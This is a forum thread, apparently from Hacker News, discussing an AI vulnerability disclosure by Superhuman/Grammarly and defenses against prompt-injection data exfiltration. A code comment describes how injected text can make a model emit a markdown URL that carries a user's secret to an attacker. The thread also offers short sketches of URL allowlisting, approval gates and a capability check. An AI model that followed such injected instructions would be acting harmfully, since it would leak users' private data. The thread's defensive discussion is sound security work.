sarelta · a day ago
I'm impressed that Superhuman seems to have handled this so well; lots of big names are fumbling their AI vulnerability disclosures. Grammarly is not necessarily who I would have bet on to get it right.
|
empiko · 19 hours ago
I wonder how they handled it. Everybody's connecting their AI to the Web, but that automatically means any data the AI has access to can be extracted by an attacker. The only safe ways forward are to (1) disconnect it from the Web, or (2) aggressively filter the URLs it generates.
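(As a rough illustration of option 2, here's a minimal sketch of allowlist-based filtering applied to model output before it's rendered. ALLOWED_HOSTS and strip_untrusted_urls are hypothetical names, not from any real product.)

    import re
    from urllib.parse import urlparse

    # Hypothetical allowlist; a real deployment would load this from config.
    ALLOWED_HOSTS = {"docs.example.com", "support.example.com"}

    URL_RE = re.compile(r"https?://[^\s)\]\"'<>]+")

    def strip_untrusted_urls(model_output: str) -> str:
        # Markdown links/images are a classic exfiltration channel: an
        # injected prompt can make the model emit a URL like
        # https://attacker.example/leak?q=<secret>, which the client
        # then fetches automatically.
        def check(match):
            host = urlparse(match.group(0)).hostname or ""
            return match.group(0) if host in ALLOWED_HOSTS else "[link removed]"
        return URL_RE.sub(check, model_output)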
ttoinou · 19 hours ago

We should have a clearer view of the AI's permissions and the operations it performs, and one button per day to accept or deny operations on given data, instead of auto-approval.
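(A minimal sketch of what replacing auto-approval with an explicit consent gate could look like. PendingOperation and run_with_approval are hypothetical names, not from any real agent framework.)

    from dataclasses import dataclass
    from typing import Callable

    @dataclass
    class PendingOperation:
        tool: str        # e.g. "send_email" or "fetch_url"
        arguments: dict  # exactly what the model asked to do

    def run_with_approval(op: PendingOperation,
                          execute: Callable[[PendingOperation], str]) -> str:
        # Surface the exact operation and block until the user decides,
        # rather than silently auto-approving the model's request.
        print(f"Assistant wants to call {op.tool} with {op.arguments}")
        if input("Approve? [y/N] ").strip().lower() != "y":
            return "Operation denied by user."
        return execute(op)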
wat10000 · 5 hours ago

Private data, untrusted data, communication: an LLM can safely have two of these, but never all three. Browsing the web is both communication and untrusted data, so an LLM that can browse the web must never have access to any private data. The problem is, so much of what people want from these things involves having all three.
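(The "two of three" rule can be stated as a policy check. A minimal sketch, with illustrative capability names not taken from any real framework:)

    # Capability names are illustrative, not from any real framework.
    PRIVATE_DATA, UNTRUSTED_INPUT, EXTERNAL_COMMS = (
        "private_data", "untrusted_input", "external_comms")

    LETHAL_TRIFECTA = {PRIVATE_DATA, UNTRUSTED_INPUT, EXTERNAL_COMMS}

    def validate_capabilities(granted: set) -> None:
        # Refuse any configuration where an agent holds all three at once.
        if LETHAL_TRIFECTA <= granted:
            raise ValueError("agent holds private data, untrusted input, and "
                             "external communication; drop at least one")

    validate_capabilities({PRIVATE_DATA, EXTERNAL_COMMS})  # fine: two of three
    # validate_capabilities(LETHAL_TRIFECTA)               # raises ValueError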
TeMPOraL · 5 hours ago

> The problem is, so much of what people want from these things involves having all three.

Pretty much. Also, there's no way of "securing" LLMs without destroying the quality that makes them interesting and useful in the first place. I'm putting "securing" in scare quotes because IMO it's a fool's errand to even try: LLMs are fundamentally not securable like regular, narrow-purpose software, and should not be treated as such.
|
|
|
djaouen · 3 hours ago
Are you f*cking kidding me? Grammarly is like the best one!